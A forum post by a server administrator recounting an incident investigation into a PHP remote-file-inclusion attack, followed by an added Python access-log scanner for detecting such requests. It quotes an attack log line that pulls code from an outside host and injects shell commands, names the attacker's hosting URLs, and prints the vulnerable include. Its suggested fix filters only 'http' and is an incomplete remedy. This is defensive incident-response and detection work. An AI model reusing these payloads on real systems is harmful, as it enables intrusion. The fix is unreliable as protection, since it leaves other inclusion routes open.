gromett
Guest
I am happy to say that since moving on to Plesk, attacks and attempts on my servers have been greatly reduced. The only ones I get now are the cross-server scripting ones. Currently I just monitor the /tmp and /var/tmp directories for suspicious files every minute, which lets me know when one is in progress. What follows is how I managed to track down how it happened so I could fix the client's dodgy script. I am posting this to help others who may not have the time or knowledge to do so.
1) I went to /var/tmp and moved all files to /root/hack for later perusal.
2) Did a ps aux to get the process IDs and file names of the scripts being run.
apache 29836 0.0 0.0 864 184 ttyp0 S 19:32 0:00 ./ssh-scan 100
These had been created by a shell called /.x
3) Did a netstat -lvanp to find out the remote IP of the attacker.
tcp 0 0 213.232.100.82:5500 222.124.31.12:4352 ESTABLISHED 7862/x
4) The hacker's IP is 222.124.31.12. Now to find out which script was responsible for the breach.
5) Used this find command to check all log files:
find /home/httpd/vhosts/ -name access_log -print -exec grep "195.93.21.100" {} \;
6) From this I could see the site name (modified):
cat /home/httpd/vhosts/thedomain.com/statistics/logs/access_log | grep "222.124.31.12" >/root/hack/access_log
Here is a sample log entry:
/eolaud.php?SiteRef=http://www.virama.com/net.txt?&cmd=cd%20/var/spool/samba;mkdir%20.ro HTTP/1.0" 200 9623 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)"
The script is called eolaud.php.
I had a look at this script and it had one line of PHP code in it:
<?
// $SiteRef comes straight from the query string (register_globals), unchecked
include $SiteRef;
?>
You can see that by passing ?SiteRef=...... you could include a file or script from another site.
I changed this script to the following and notified the client:
<?
// eregi() matches case-insensitively, so any value containing "http" is discarded
if (eregi("http",$SiteRef)) {
$SiteRef="";
}
include $SiteRef;
?>
If a remote address is now entered it blanks the variable.
In addition to this I have contacted the 4 hosts that were used by the hacker, including:
http://geocities.com/evikhobare/dodol.txt
www.virama.com
the IP owner for the hacker, and the site where he had his hacking tools hosted.
Hopefully he will be shut down. I have offered all the forensic evidence to the providers if they want to bring the authorities in.
I am updating my checking scripts to include an hourly scan of all access_logs looking for /var/tmp and /tmp.
I hope this info helps.
Regards, Karl
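The hourly access_log scan mentioned above, written out as an added example (not Karl's script): it flags query parameters whose value is a URL (the eolaud.php?SiteRef=http://... remote-include pattern), names /tmp or /var/tmp, or carries shell separators like the ";" in the cmd= value. The log lines are constructed for this example; only the request from the sample entry is reused.

```python
"""Flag RFI / command-injection attempts in Apache access_log lines.
Added example, not code from the original post: automates the hourly
access_log check described above. Sample lines are constructed."""
import re
from urllib.parse import unquote

REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[0-9.]+"')  # "GET /x HTTP/1.0"
SCHEME_RE = re.compile(r'^\s*(?:https?|ftp|php|data|file)://', re.IGNORECASE)
TMP_RE = re.compile(r'/(?:var/)?tmp(?:/|\b)')   # /tmp, /var/tmp and paths below them
META_RE = re.compile(r'[;|`]|\$\(')             # shell command separators
RFI, TMP, CMD = "remote URL in value", "tmp path in value", "shell separator in value"

def query_params(target):
    """Split the query of '/x.php?a=b&c=d' on '&' only and URL-decode both
    sides, so an injected ';' stays inside the value instead of splitting it."""
    params = []
    for pair in target.partition("?")[2].split("&"):
        if pair:
            name, _, value = pair.partition("=")
            params.append((unquote(name), unquote(value)))
    return params

def suspicious_params(target):
    """Return [(param_name, reason), ...] for one request target."""
    findings = []
    for name, value in query_params(target):
        if SCHEME_RE.match(value):
            findings.append((name, RFI))
        if TMP_RE.search(value):
            findings.append((name, TMP))
        if META_RE.search(value):
            findings.append((name, CMD))
    return findings

def scan_log(lines):
    """Return [(client_ip, target, findings), ...] for suspicious log lines."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if m and (findings := suspicious_params(m.group("target"))):
            hits.append((line.split(" ", 1)[0], m.group("target"), findings))
    return hits

# Constructed combined-format lines; the first reuses the request from the post.
SAMPLE_LOG = [
    '222.124.31.12 - - [01/Jan/2004:19:30:02 +0000] "GET /eolaud.php?SiteRef=http://www.virama.com/net.txt?&cmd=cd%20/var/spool/samba;mkdir%20.ro HTTP/1.0" 200 9623 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)"',
    '10.0.0.7 - - [01/Jan/2004:19:31:10 +0000] "GET /eolaud.php?SiteRef=news.inc HTTP/1.1" 200 1200 "-" "Mozilla/5.0"',
    '10.0.0.8 - - [01/Jan/2004:19:32:44 +0000] "GET /index.php?page=/var/tmp/.x HTTP/1.1" 200 80 "-" "curl/7.1"',
]
```

Run `scan_log` over the real access_log lines of each vhost; the first sample line yields both the SiteRef remote URL and the cmd= shell separator, the third the /var/tmp reference, and the benign request nothing.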